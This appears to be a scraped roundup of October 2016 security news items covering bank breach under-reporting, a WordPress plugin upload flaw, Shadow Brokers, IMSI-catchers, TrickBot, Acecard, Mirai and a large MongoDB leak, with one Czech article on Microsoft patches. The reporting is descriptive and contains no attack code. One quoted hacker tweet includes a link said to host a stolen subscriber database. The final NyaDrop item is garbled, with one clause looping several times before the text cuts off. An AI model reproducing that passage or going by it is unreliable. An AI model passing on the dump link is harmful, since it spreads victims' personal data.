All compression libraries are considered outdated or "poorly-written," and must be replaced with modern and more secure zip libraries.
If the system is encrypted, the boot password in UEFI mode or its length can be determined.
The majority of flaws have been fixed in the latest VeraCrypt version 1.19 release, but a few of them including AES implementation have not yet been patched due to substantial modifications of the code or/and the architecture of the project.
So, according to the OSTIF, "VeraCrypt is much safer after this audit, and the fixes applied to the software mean that the world is safer when using this software."
You are recommended to download the latest VeraCrypt version 1.19.
British banks downplay security breaches
18.10.2016 securityaffairs Crime
Banks and financial institution in the UK are reportedly failing to disclose the full extent security breaches they are experiencing.
UK banks are reportedly failing to disclose the full extent of the number and nature of security incidents they are experiencing due to a fear of financial punishment and negative publicity.
Banking execs and security experts have stated that the banks are using grey areas in reporting structures in order to downplay the extent of which they are being targeted on a daily basis.
According the UK’s financial regulation authority, the FSA, where banks have an obligation to report any incident to, have claimed last month that last year there were only a total of 75 incidents.
This in itself is a marked increase from the declared 27 in 2015 and 5 in 2014. Any active members of the security industry will recognize these figures as incredibly low and unrealistic given the nature of today’s security and malware environment.
“Banks are dramatically under-reporting attacks, they do what’s legally required but out of embarrassment or fear of punishment they aren’t giving the whole picture,” was the claim from an anonymous source within the cyber security space of the banking sector.
security breaches
Mark James, a security specialist from ESET stated “Reporting every one of those attempts would indeed clog systems with lots of unnecessary information and I’m sure there will be a lot that never makes the light of day,”
He went on to add “However, the problem of course is perceived security, as more and more breaches happen and more malware is being used to target financial systems, then the damage caused when things go wrong can be so great decisions will be made to keep it quiet. However, with the public becoming more aware of the damage caused by lapsed security, this may influence the decision on who is to look after their savings and daily finances in the future.”
These figures could be set to change as the reporting parameters are expected to be tightened with the imminent EU General Data Protection Regulation (GDPR) which will introduce a mandatory reporting structure that all UK banks and lenders will be compelled to comply with.
This will require mandatory notification within 72 hours of security breaches and will instate the possibility of fines of up to £18M GBP or 4% of annual turnover for what’s deemed as a serious non-compliance and infractions.
Crooks exploit a zero-day in WordPress eCommerce Plugin to upload a backdoor
18.10.2016 securityaffairs Vulnerebility
Experts from the White Fir Design discovered cybe rcriminals exploited a zero-day flaw in an e-commerce plugin for WordPress to upload a backdoor.
According to the experts from the firm White Fir Design, crooks exploited a zero-day flaw in an e-commerce plugin for WordPress to upload backdoors to affected websites.
The plugin is WP Marketplace, a plugin for the popular WordPress CMS that implements e-commerce features. The plugin is not so popular, it is installed on less than 500 websites worldwide and the bad news it that it is no longer maintained, so the security holes will never be patched. The WP Marketplace was not updated in the last 8 months and last week it was removed from the official WordPress Plugin Directory.
The experts noticed requests for a certain file associated with the flawed WP Marketplace, they discovered that was a scan for websites running the plugin in the attempt to exploit the flaw.
The issue is an arbitrary file upload vulnerability as explained by the experts.
“Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. Requesting a file from a plugin that isn’t installed on a website is usually indication that a hacker is probing for usage of it before exploiting something. We have also seen some requests for the file in the third-party data we monitor as well.” read the analysis published by White Fir Design. “Seeing as arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case, we quickly found one. In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is made accessible when loading admin pages (as the function is_admin() tells you that, not if the user is Administrator)”
The researchers from the security firm Sucuri also observed attack attempts in the wild, they confirmed that cyber criminals have been exploiting arbitrary file upload vulnerability to upload a backdoor on the affected websites.
“We checked our Website Firewall logs and confirmed that the WP Marketplace vulnerability is now a part of a hacker’s toolkit. When they detect sites with the installed plugin, they try to exploit the vulnerability and upload backdoors.” states a blog post published by Sucuri.
“Of course, it is not as valuable for hackers as vulnerabilities in popular plugins installed on every other site, but if your toolkit comprises hundreds of smaller vulnerabilities, the success rate will be comparable,” said Sucuri’s Denis Sinegubko. “That’s why plugin developers shouldn’t neglect best security practices even when developing small plugins.”
The experts from White Fir Design highlighted that the same development team also distributed other plugins, including the WordPress Download Manager that is affected by the file upload flaw at least since June and it is still unpatched.
Shadow Brokers launched a crowdfunding campaign to raise 10,000 bitcoins
18.10.2016 securityaffairs APT
The group calling itself The Shadow Brokers who hacked the NSA-linked Equation Group announced the launch of a crowdfunding campaign for the stolen arsenal.
This summer the hacker group Shadow Brokers hacked the NSA-linked group known as the Equation Group and leaked 300 Mb of hacking tools, exploits, and implants.
The Shadow Brokers launched an all-pay auction for the full archive containing the entire arsenal of the Equation Group. Early October, The Shadow Brokers have complained that no one has offered money for their precious archive.
The auction received offers for less than two bitcoins, so the hacker group decided to launch a crowdfunding.
The Shadow Brokers team has collected bids for a total of 1.76 bitcoins (roughly $1,100), but the dreaded team was expecting to earn as far as $1 million.
But probably we misunderstood the intent of the hackers because the hackers’ crowdfunding campaign aims to raise 10,000 bitcoins (roughly $6.4 million).
“TheShadowBrokers is being bored with auction so no more auction. Auction off. Auction finish. Auction done. No winners. So who is wanting password? TheShadowBrokers is publicly posting the password when receive 10,000 btc (ten thousand bitcoins). Same bitcoin address, same file, password is crowdfunding. Sharing risk. Sharing reward. Everyone winning.” reads the announcement published by the group.
But unfortunately, the crowdfunding campaign is not obtaining the expected results.
Who is the behind the Shadow Brokers crew?
Some experts speculate it is a group of Russian state-sponsored hackers, government, other believe that it is a group of hackers that has simply found the arsenal that was mistakenly left unattended by an employee or a contractor on a remote server.
The ShadowBrokers hackers then have discovered the server and raided it.
“NSA officials have told investigators that an employee or contractor made the mistake about three years ago during an operation that used the tools, the people said.” reported the Reuters.
“That person acknowledged the error shortly afterward, they said. But the NSA did not inform the companies of the danger when it first discovered the exposure of the tools, the sources said. Since the public release of the tools, the companies involved have issued patches in the systems to protect them.”
UK Police purchased IMSI-catcher technology for mobile surveillance
17.10.2016 securityaffairs Mobil
According to documents analyzed by The Bristol Cable media Agency, the UK authorities have purchased IMSI-catcher equipment.
Privacy advocates and rights groups are in revolt against the UK law enforcement that has purchased mobile phone snooping technology.
The rights groups are protesting against the adoption of the IMSI-catcher technology that could be used for dragnet surveillance.
The IMSI-catcher is a surveillance solution used for intercepting mobile phone traffic, calls, tracking movements of mobile phone users block phones from operating.
An IMSI catcher runs a Man in the Middle (MITM) attack acting as a bogus mobile cell tower that sits between the target mobile phone and the service provider’s real towers.
The UK police has purchased police this mobile phone snooping technology to track suspects’ devices and intercept their communications as part of their investigations.
The problem is that devices such as the IMSI-catcher monitor indiscriminately monitor mobile devices in an area of up to 8km, representing a serious threat to users’ privacy.
Rights groups are demanding for transparency from the police about the use of surveillance technology.
According to the Bristol Cable the UK police is using the Stingray equipment for its operations. The law enforcement has reportedly purchased “covert communications data capture” equipment (CCDC) from a UK firm, the Cellxion.
“IMSI Covert Communications” that was earmarked £144,000. In the same budget the “CCDC” item was allocated at the same price, £144,000.
“South Yorkshire police confirmed that ‘CCDC’ and ‘IMSI Covert Communications’ are the same budget item.”
The invoices obtained by the Cable, the local UK police paid Cellxion £169,575.00 for CCDC equipment, as well as other “communications and computing equipment.”
“Suspicions have been raised in the past that IMSI-catchers are in use in the UK. These suspicions, until now, have focused on the Metropolitan Police’s purchase and use of the technology. Now, the Cable can exclusively reveal that at least five other forces appear to have contracted for IMSI-catchers, including Avon and Somerset (A&S) Constabulary.” revealed The Bristol Cable “This revelation comes from decrypting for the first time the acronym – CCDC, standing for covert communications data capture – in use by police forces across the country to obscure their apparent purchase of IMSI-catchers, and identifying police contracts with Cellxion, a firm that manufactures them.”
Privacy International advocacy officer Matthew Rice condemned the lack of transparency in the use of IMSI catcher technology. Now that we now know the acronyms used by the police, it is important to reveal the real use of surveillance technology.
“While journalists and activists [have] spent time requesting information about IMSI-catchers… the real question we should have been asking our police forces was about the term CCDC (covert communications data capture),” he says.
“The longer the policy of denial of existence of these capabilities go on, the worse it is for police, citizens, and civil liberties in the United Kingdom,” he says.
It is still unclear whether the UK police and intelligence agencies have used IMSI-catchers and in which kind of operations.
The new TrickBot Banking Trojan seems to have been developed by Dyre authors
17.10.2016 securityaffairs Virus
Researchers at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan is now behind the new Trickbot malware.
This morning I published a post on the data provided by Group-IB on crime trends, the report published by the security firm reveals a continuous evolution of cybercriminal ecosystem. The story that I’m going to tell you confirms this rapid evolution, at least one of the author behind the infamous Dyre banking Trojan (aka Dyreza) is apparently working on a new banking Trojan dubbed ‘TrickBot.’
The Dyreza botnet infected hundreds of thousands of machines worldwide, according to the Heimdal Security, in November 2015 more than 80.000 machines were already infected with Dyre Trojan across the world. Security experts estimated that users of more than 1000 financial institutions have fallen victim of the threat.
In November 2015, Dyre activity ceased, the Reuters agency also reported authorities raided offices of a Russian film distribution and production company as part of an operation against the Dyre gang.
The operation of the Russian police successfully beheaded the organization behind the Dyre Trojan,
“We have seen a disruption over the last few months that is definitely consistent with successful law enforcement action,” explained security expert John Miller from iSight Partners.
Now security experts at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan has escaped the arrest and he is now participating in a new project.
banking-600x400
Researchers at Fidelis Cybersecurity that are monitoring the evolution of the TrickBot malware speculate it has a strong connection to Dyre banking trojan.
The security firm first spotted the TrickBot malware in September while it was used by crooks to target the customers of Australian banks (ANZ, Westpac, St. George and NAB).
The first TrickBot samples analyzed by the experts were implementing a single data stealer module, but a few weeks later, the researchers discovered a new sample including webinjects that appear to be in the testing phase.
“In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has a strong connection to the Dyre banking trojan. From first glance at the loader, called TrickLoader, there are some striking similarities between it and the loader that Dyre commonly used. It isn’t until you decode out the bot, however, that the similarities become staggering.” reads the analysis published by Fidelis Cybersecurity.
“This would suggest, but is far from conclusive, that some individuals related to the development of Dyre have found their way into resuming criminal operations.”
TrickBot and Dyre have many similarities, the code of the new banking trojan seems to have been rewritten with a different coding style, but maintaining many functionalities.
TrickBot includes more C++ code, compared to Dyre, which is mostly written using the programming language C. Another difference is that the new trojan leverages on the Microsoft CryptoAPI instead of built-in functions for AES and SHA-256 hashing.
Below the main differences highlighted in the analysis:
Instead of running commands directly the bot interfaces with TaskScheduler through COM for persistence
Instead of running an onboard SHA256 hashing routine or AES routine the bot utilizes Microsoft CryptoAPI
There is considerably more code in the C++ programming language versus the original Dyre that used C for the most part.
“Based on these observations, it is our assessment with strong confidence that there is a clear link between Dyre and TrickBot but that there is considerable new development that has been invested into TrickBot. With moderate confidence, we assess that one of more of the original developers of Dyre is involved with TrickBot.” states the post.
The analysis of the custom crypter revealed that the malware loader (TrickLoader) is the same used by other malware such as Vawtrak, Pushdo and Cutwail malware. This last malware is associated with the spambot used by threat actor behind the Dyre threat, this element suggests that cybercriminals are trying to rebuild the Cutwail botnet.
For further information give a look at the post that includes a full list of IOCs and hashes.
‘Adult’ video for Facebook users
17.10.2016 Kaspersky Social
In April of this year, we registered some mass attacks on Facebook users in Russia. As a result, many Russian-speaking users of the social network fell victim to fraudsters. Half a year later the fraudsters have used the same tactics to attack Facebook users in Europe.
The attackers use a compromised Facebook account to post a link to an adult video that is supposedly on the popular YouTube service. In order to attract potential victims, “likes” are added from the account holder’s list of friends. The fraudsters rely on the user or their friends being curious and those who would like to watch an “18+” video.
Clicking on the link opens a page made to look like YouTube.
However, a quick look at the address bar is enough to see that the page has nothing to do with YouTube. During the latest attack the fraudsters distributed a “video” located on the xic.graphics domain. The domain is not currently available, but we discovered more than 140 domains with the same registration data that can be used for similar purposes.
After trying to start the video, a pop-up banner appears prompting the user to install a browser extension. In this particular example, it was called ‘Profesjonalny Asystent’ (Professional assistant), but we also came across other names.
The “View details” message explains that if the extension is not installed, the video cannot be viewed.
The attackers are banking on an intrigued victim not being interested in the details and just installing the extension. As a result, the extension gains rights to read all the data in the browser, which the fraudsters can later use to get all the passwords, logins, credit card details and other confidential user information that is entered. The extension can also continue spreading links to itself on Facebook, but now in your name and among your friends.
We strongly recommend not clicking such links and not installing suspicious browser extensions. It’s also worth checking if any suspicious extensions have already been installed. If any are discovered, they should be immediately removed via the browser settings, and the passwords for sites that are visited most often, especially online banking, should be changed.
Kritické bezpečnostní chyby mají Windows, Internet Explorer i Office
17.10.2016 Novinky/Bezpečnost Zranitelnosti
Hned několik kritických chyb bylo odhaleno v softwarových produktech společnosti Microsoft. Trhliny byly nalezeny v operačním systému Windows, prohlížečích Internet Explorer i Edge a také v kancelářském balíku Office. Americký softwarový gigant již nicméně pro všechny zranitelnosti vydal opravy.
Objevené chyby jsou velmi nebezpečné, protože se podle serveru The Hacker News ukázalo, že je ještě před vydáním záplat mohli zneužít počítačoví piráti.
Ti přitom prostřednictvím nich mohli spustit na cizím počítači prakticky libovolný škodlivý kód. Stejně tak ale mohli přistupovat k nastavení napadeného stroje či k uloženým datům na pevném disku. Pro kritické zranitelnosti bylo vydáno celkem pět bezpečnostních záplat.
Administrátorský vs. uživatelský účet
Zajímavé je mimochodem také to, že útočníci skrze trhliny mohli získat pouze taková práva, jaká měl nastavená samotný uživatel. Kontrolu nad postiženým systémem tak mohli kyberzločinci převzít pouze v případě, že uživatel na stroji pracoval s administrátorskými právy.
To bohužel v praxi dělá celá řada uživatelů. Nově objevené chyby tak opět ukazují, jak nebezpečné je používat účet administrátora při běžné práci. Daleko vhodnější je vytvořit – nejen ve firmách, ale i v domácích podmínkách – na počítači více účtů a běžně používat pouze ty, které mají uživatelská oprávnění.
Účet s právy administrátora by měl být zapnut pouze v případě, kdy je to skutečně nezbytné.
Důležité opravy
Vedle oprav kritických chyb uvolnil americký počítačový gigant také několik důležitých aktualizací, které slouží především ke zlepšení funkčnosti samotného systému, ale například také kancelářského balíku Office. Ty ale nepředstavují pro uživatele žádné velké bezpečnostní riziko.
Stahovat všechny záplaty pro kritické i důležité trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.
V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, neměli by s jejich stažením otálet. V opačném případě nechávají pro počítačové piráty otevřená zadní vrátka do svých počítačů.
The Mirai botnet is targeting also Sierra Wireless cellular data gear products
16.10.2016 securityaffairs BotNet
Sierra Wireless is warning its customers to change factory credentials of its AireLink gateway communications products due to Mirai attacks.
Sierra Wireless is warning its customers to change factory credentials of its AireLink gateway communications product.
The company is aware of a significant number of infections caused by the Mirai malware, a threat specifically designed to compromise poorly configured IoT devices.
The malware was first spotted in August by MalwareMustDie have analyzed samples of this new ELF trojan backdoor. The name of the malware is the same of the binary,”mirai.*,” and according to the experts, several attacks have been detected in the wild.
The Mirai malware scans the web searching for connected devices such as DVRs and IP-enabled cameras that use default or hard-coded credentials.
Back to the to the Sierra Wireless alert, the company is warning its customers that of Mirai attacks against the AirLink Cellular Gateway devices (LS300, GX400, GX/ES440, GX/ES450 and RV50).
“Sierra Wireless has confirmed reports of the ‘Mirai’ malware infecting AirLink gateways that are using the default ACEmanager password and are reachable from the public internet. The malware is able to gain access to the gateway by logging into ACEmanager with the default password and using the firmware update function to download and run a copy of itself,” Sierra Wireless wrote in a security bulletin . “Devices attached to the gateway’s local area network may also be vulnerable to infection by the Mirai malware.”
The Mirai botnet was involved in a number of severe attacks, according to the experts it powered DDoS attacks against the website of the popular investigator Brian Krebs and the OVH hosting provider that reached 1Tbps.
Unfortunately, the number of malware specifically designed to infect IoT systems continue to increase. This week, Security Affairs published in exclusive the discovery of a new threat, dubbed NyaDrop, made by experts at MalwareMustDie.
“There is evidence that ‘Internet of Things’-type devices have been infected with the Linux malware Mirai, which attackers used in the recent DDoS attacks against the web site Krebs on Security,” reads a security bulletin published by the US ICS-CERT.
US is thinking of a possible cyber strike against the Kremlin
16.10.2016 securityaffairs Cyber
The US Government is thinking of a possible cyber strike against the Kremlin in response to the alleged interference with the 2016 presidential election.
A few days ago the US Government has formally accused the Russian Government of trying to interfere in the 2016 Political Election.
Washington is officially accusing Russia trying to interfere the 2016 US presidential election, announcing it will adopt all necessary countermeasures to defeat the threat.
The Office of the Director of National Intelligence and the Department of Homeland Security have issued a joint security statement to accuse the Russian government of a series of intrusions into the networks of US organizations and state election boards involved in the Presidential Election.
“The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations. The recent disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts. These thefts and disclosures are intended to interfere with the US election process” reads the statement.
“We will take action to protect our interests, including in cyberspace, and we will do so at a time and place of our choosing,” a senior administration official told AFP.
“The public should not assume that they will necessarily know what actions have been taken or what actions we will take.”
On Friday, the US Vice President Joe Biden during an interview with NBC explained that “message” would be sent to Russian President Vladimir Putin over the alleged hacking.
“Vice President Joe Biden told “Meet the Press” moderator Chuck Todd on Friday that “we’re sending a message” to Putin and that “it will be at the time of our choosing, and under the circumstances that will have the greatest impact.” reported the NBCnews.
“When asked if the American public will know a message was sent, the vice president replied, “Hope not.“”
According to NBC, the CIA was preparing a retaliatory cyber attack “designed to harass and ’embarrass’ the Kremlin leadership.”
“The Obama administration is contemplating an unprecedented cyber covert action against Russia in retaliation for alleged Russian interference in the American presidential election”
Yes, but what does it mean to think of a covert operation when diplomat shout revenge in the wild? Clearly, the US politic is using the cyber threat as deterrence for further initiatives of the Kremlin.
These statements are useless, both governments already conducting covert operations against their adversary, and history is full of examples.
According to the NBC News, the sources did not elaborate on the tactic that the CIA was considering but said the US intelligence is already selecting targets and making other preparations for a cyber operation.
Former intelligence officers explained that the CIA is likely working at a PSYOPs by gathering reams of documents that could expose “unsavory tactics” by President Vladimir Putin.
On the other side, the Russian Government denies any interference with the 2106 Presidential election, the Kremlin spokesman Dmitry Peskov replied to the Biden’s statements saying that his Government would take precautions to protect itself from the “unpredictability and aggressiveness of the United States.”
“The threats directed against Moscow and our state’s leadership are unprecedented because they are voiced at the level of the US vice president,” reported the Russian RIA Novosti news agency.
“To the backdrop of this aggressive, unpredictable line, we must take measures to protect (our) interests, to hedge risks.”
Intelligence analysts believe that the two governments will intensify the operations in the cyberspace, the Russian diplomat Yuri Ushakov vowed Moscow would respond to any cyber attacks powered by Washington.
Ushakov declared that the Kremlin will consider any attack from the cyberspace as a “borderline insolence.”
Why Russian hackers are interfering with 2016 political elections?
According to some experts, the Kremlin aims to favor Donald Trump who has praised by Vladimir Putin. The crisis among Russia and US was exacerbated due to Crimea invasion and Russian support to the Syrian government.
Symantec observed a surge of spam emails using malicious WSF files
16.10.2016 securityaffairs Spam
Symantec observed a significant increase in the number of email-based attacks using malicious Windows Script File (WSF) attachments.
Experts from Symantec are observing a significant increase in the number of email-based attacks leveraging malicious Windows Script File (WSF) attachments. Over the past three months, threat actors have adopted the tactic in the wild, mostly criminal organizations behind ransomware campaign.
“In the past two weeks, Symantec has blocked a number of major campaigns distributing Locky (Ransom.Locky) which involved malicious WSF files.” reads a blog post from Symantec.
A Windows Script File (WSF) is a file type that allows mixing the scripting languages, such as Pyton, JScript and VBScript within a single file.
WSF files are opened and executed by the Windows Script Host (WSH), they can be launched like a common executable file.
Symantec highlighted that .wsf files are not automatically blocked by some email clients. Threat actors used malicious Windows Script File files in a number of recent major spam campaigns spreading ransomware link Locky.
Symantec blocked more than 1.3 million emails bearing the subject line “Travel Itinerary” between October 3 and 4. In this campaign, hackers leveraged on malicious emails purported to come from a major airline that came with Windows Script File file within a .zip archive.
Symantec added that on October 5, the same threat actor launched a new massive spam campaign with the subject line “complaint letter.”
“Symantec blocked more than 918,000 of these emails. The email purported to come from someone representing a client who was making a complaint “regarding the data file you provided.” Once again, the emails came with an attachment that consisted of a WSF file within a .zip archive. If the WSF file was allowed to run, Locky was installed on the victim’s computer.” added Symantec.
Experts from Symantec believe that the used of .WSF file is a broader trend, the number of emails being blocked containing this kind of malicious attachments is increased in the last months as reported in the following graph.
“From just over 22,000 in June, the figure shot up to more than 2 million in July. September was a record month, with more than 2.2 million emails blocked.” reads the post from Symantec.
Threat actors in the wild often adopt new tactics frequently changing the format of the malicious attachments for their campaigns to avoid detection.
Crack for Charity — GCHQ launches 'Puzzle Book' Challenge for Cryptographers
16.10.2016 thehackernews BigBrothers
The UK's Signals Intelligence and Cyber Security agency GCHQ has launched its first ever puzzle book, challenging researchers and cryptographers to crack codes for charity.
Dubbed "The GCHQ Puzzle Book," the book features more than 140 pages of codes, puzzles, and challenges created by expert code breakers at the British intelligence agency.
Ranging from easy to complex, the GCHQ challenges include ciphers and tests of numeracy and literacy, substitution codes, along with picture and music challenges.
Writing in the GCHQ Puzzle Book's introduction, here's what GCHQ Director, Robert Hannigan says:
"For nearly one hundred years, the men and women of GCHQ, both civilian and military, have been solving problems. They have done so in pursuit of our mission to keep the United Kingdom safe. GCHQ has a proud history of valuing and supporting individuals who think differently; without them, we would be of little value to the country. Not all are geniuses or brilliant mathematicians or famous names, but each is valued for his or her contribution to our mission."
The idea for the GCHQ Puzzle Book came after the success of last year's cryptographic puzzle challenge that was dubbed the 'hardest puzzle in the world' and featured in Hannigan's Christmas card.
Nearly 600,000 people from across the globe take part in the challenge; only 30,000 had made it reach the final stage, but three people came very close, who were considered winners by the GCHQ.
However, the solution to the Christmas puzzle, including explanations from the puzzle-setters, was publicly made available early this year for anyone to have a look.
The GCHQ Puzzle Book, published by Penguin Random House, will be on sale from 20th October at High Street book retailers and online.
All GCHQ earnings from the book will be donated to Heads Together — the "campaign spearheaded by the Duke and Duchess of Cambridge and Prince Harry, to tackle stigma, raise awareness and provide vital help for people with mental health challenges."
FBI is Investigating Theft of $1.3 Million in Bitcoin from a Massachusetts Man
16.10.2016 thehackernews Crime
Over two months ago, the world's third largest Bitcoin Exchange Bitfinex lost around $72 Million worth of Bitcoins in a major hack.
Shortly after the company encountered a $72,000,000 Bitcoin theft, an unnamed Bitfinex user from Cambridge, Massachusetts, filed a police report in September, alleging that $1.3 Million of funds were stolen from his account.
Since then the Cambridge police have handed the case over to the FBI, which is working with the Bitcoin exchange as well as European authorities to recover funds stolen from the Bitfinex user, Coindesk reports.
The individual claimed that he held $3.4 Million in Bitcoin in his personal wallet hosted by the Bitfinex Bitcoin exchange. But following the August’s Bitfinex breach, he was left with $2.1 Million in his account.
Bitfinex then notified the individual of his initial loss of approximately $1.3 Million in Bitcoin, but after the company issued IOU tokens as an emergency measure to keep the exchange operating, the loss incurred was reduced to just $720,000.
The IOUs or BFX tokens are a form of compensation provided to the victims to reduce their losses by a significant factor.
Although specific details remain still unclear, the Bitfinex user confirmed lose of funds beyond Bitfinex IOU tokens issued to all the victims of the breach.
The usability of the token is still unclear. Neither the explanation of tokens provided by Bitfinex is much clear, nor the legal status of the tokens is known.
"The BFX tokens will remain outstanding until repaid in full by Bitfinex or exchanged for shares of iFinex Inc," explains the company. "The specific conditions associated with the exchange of these tokens will be explained in a later announcement."
For the incident report filed by the Bitfinex user, you can head on to this link. No further details about the case are available at this moment.
Shortly after the breach of around $72 Million worth of its customers' Bitcoins, Hong Kong-based Bitcoin exchange announced a reward of $3.5 Million to anyone who can provide information that leads to the recovery of the stolen Bitcoins.
The incident was so big that the price of Bitcoin was dropped almost 20%, from $602.78 to $541 per Bitcoin, within a day after the announcement.
58M records dumped from an unsecured DB of the Modern Business Systems
16.10.2016 securityaffairs Crime
Hackers have leaked online over 58 million customer records from data storage firm Modern Business Systems, but the situation could be more severe.
58 million customer records have been leaked online by hackers, the huge trove of data seems to come from a data storage firm.
The records include personal information such as names, dates of birth, email and postal addresses, job titles, phone numbers, vehicle data, and IP addresses.
The archive appears to have been exfiltrated from an unsecured database of the Modern Business Systems (MBS), which is a company that provides data storage and database hosting services.
I received a portion of the archive a few days ago by the hacker which uses the Twitter account @0x2Taylor. When the hacker sent me the archive we both had no idea about its source.
The hacker released at least 58 million records stolen from Modern Business Systems’s systems.
Segui
#BBK ~ $Taylor @0x2Taylor
Database Loaded : 52 Million Subscriber DB https://mega.nz/#!t9EyUapD!uOfzzH-SJOlYycdYTq8AKzdcBoR8R02kXvZ3naaL3Xs … Email,DOB,Name,Address,IP,Phone Number. #0x2Gang #DataDump
02:01 - 8 Ott 2016
8 8 Retweet 16 16 Mi piace
Experts who analyzed the archive determined that it belongs to MBS which was exposing an unsecured MongoDB database on the Internet.
“While the data itself is easy enough to read, identifying the owner of the database has been more challenging. Nothing within the dumped dataset itself pointed to who might be responsible for the information. Through additional investigation and subsequent exchanges with 0x2Taylor, researchers were able to obtain the IP address of the database.” reads a blog post published by Risk Based Security. “With that information, researchers were able to confirm it was an open MongoDB installation and identify the owner as Modern Business Solutions. Working with Databreaches.net, Modern Business Solutions was contacted and made aware of the issue. Although neither RBS or Databreaches.net have yet received a reply from Modern Business Solutions, the database has since been secured and is no longer accessible.”
The database includes data from companies that are customers of the MBS, if you have had a business relationship with it you can check for the presence of your data through the breach notification service “Have I Been Pwned?” .
Unfortunately, the situation is probably more severe because giving a close look at the above image experts speculate the hacker had access to a database containing over 258 million rows of customer records.
This breach is the last in order of time that is related to misconfigured MongoDB databases. In the past security experts
In December the popular expert and Shodan creator John Matherly found over 650 terabytes of MongoDB data exposed on the Internet by vulnerable databases.
Android Acecard banking trojan asks users for selfie with an ID card
16.10.2016 securityaffairs Android
Experts discovered a new variant of the Android Acecard banking trojan that asks victims to take a selfie while they are holding an ID card.
The inventiveness of the criminals is a never ending pit. Recently, a number of organizations announced a new authentication method based on the selfies. For example, HSBC customers can open new bank accounts using a selfie, such as the Bank of Scotland and many other financial organizations and Mastercard.
Crooks have already started taking advantage of this new method of biometric authentication, experts at McAfee discovered a new Android banking Trojan, dubbed Acecard, that pretends to be an adult video app or a codec/plug-in necessary to see a specific video.
“Recently the McAfee Labs Mobile Research Team found a new variant of the well-known Android banking Trojan Acecard (aka Torec, due to the use of Tor to communicate with the control server) that goes far beyond just asking for financial information.” reads a blog post published by McAfee. “In addition to requesting credit card information and second-factor authentication, the malicious application asks for a selfie with your identity document—very useful for a cybercriminal to confirm a victim’s identity and access not only to banking accounts, but probably also even social networks.”
The fake video plugin appears like an Adobe Flash Player, a pornographic app, or video codec.
When it is running in the background, the Acecard banking Trojan monitors the opening of specific apps usually associated with payment transactions. When the victim will open one of these apps the malware will present him a main phishing overlay, pretending to be Google Play and asking for a credit card number, that requests the submission of the card details and more personal and financial data (i.e. Cardholder name, date of birth, phone number, credit card expiration date, and CCV)
After collecting credit card and personal information from the victim, the Acecard banking Trojan the malware asks victims to complete a fake “identity confirmation” composed of three steps. In the first two steps the app requests the victim to upload a clean and readable photo of the front and back side of his identity document (national ID, passport, driver’s license):
In the final step, the malicious app asks victims to take a selfie while holding their ID card.
“After collecting credit card and personal information from the victim, the malware offers a fake “identity confirmation” that consists of three steps. The first two steps ask the user to upload a clean and readable photo of the front and back side of the victim’s identity document (national ID, passport, driver’s license).” continues the post. “The final step asks for a selfie with the identity document.”
The information collected by the Acecard banking Trojan allows attackers to perform several illegal activities that would result in the victim’s identity theft.
According to the experts, this variant of the Acecard banking Trojan has impacted users in Singapore and Hong Kong.
As usual, let me suggest avoid download from untrusted app stores and carefully review the permissions apps are asking for … and of course don’t take selfies while holding your ID card.
Android Banking Trojan Tricks Victims into Submitting Selfie Holding their ID Card
15.10.2016 thehackernews Android
Advanced Android Banking Trojan Tricks Victims to Submit a Selfie Holding Their ID Card
While some payment card companies like Mastercard have switched to selfies as an alternative to passwords when verifying IDs for online payments, hackers have already started taking advantage of this new security verification methods.
Researchers have discovered a new Android banking Trojan that masquerades primarily as a video plugin, like Adobe Flash Player, pornographic app, or video codec, and asks victims to send a selfie holding their ID card, according to a blog post published by McAfee.
The Trojan is the most recent version of Acecard that has been labeled as one of the most dangerous Android banking Trojans known today, according to Kaspersky Lab Anti-malware Research Team.
Once successfully installed, the trojan asks users for a number of device's permissions to execute the malicious code and then waits for victims to open apps, specifically those where it would make sense to request payment card information.
Acecard Steals your Payment Card and Real ID details
android-banking-malware
The banking trojan then overlays itself on top of the legitimate app where it proceeds to ask users for their payment card number and card details such as card holder's name, expiration date, and CVV number.
"It displays its own window over the legitimate app, asking for your credit card details," explains McAfee researcher Bruce Snell. "After validating the card number, it goes on to ask for additional information such as the 4-digit number on the back."
Once this is done, the trojan then looks to obtain users' personal information, including their name, date of birth, mailing address, for "verification purposes," and even requests a photo of the front and back sides of their ID card.
After this, the Trojan also prompts to ask users to hold their ID card in their hand, underneath their face, and take a selfie.
Hackers can make illegal Transfers and Take Over your Online Accounts
All these pieces of information are more than enough for an attacker to verify illegal banking transactions and steal access to victims' social media accounts by confirming the stolen identities.
So far this version of Acecard Android banking Trojan has impacted users in Singapore and Hong Kong.
This social engineering trick of Trojan obviously is not new, and any tech-savvy users would quickly catch this malicious behavior as there is no reason for Google to ask for your ID card. But the trick still works with non and less technical users.
Since all of these fake apps have been distributed outside of Google Play Store, users are strongly advised to avoid downloading and installing apps from untrusted sources. Besides this, users should pay attention to the permissions apps are asking for.
Most importantly: No app needs a photo of you holding your ID card except perhaps a mobile banking service. So, always be cautious before doing that.
Exclusive – ELF Linux/NyaDrop, a new IoT threat in the wild
15.10.2016 securityaffairs Virus
Exclusive: interview made by @unixfreaxjp of MalwareMustDie for Security Affairs about the Linux/NyaDrop. The latest details about this new dangerous IoT malware.
After the Krebs DDoS attacks the enrollment of new IoT botnets is going to grow and new large “zombie army” made by of web-ip-cam, DVR/NVR, routers/modems are invading the cyberspace.
The evidence of this comes from the finding of a new undetected malware codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous Mirai, MalwareMustDie!
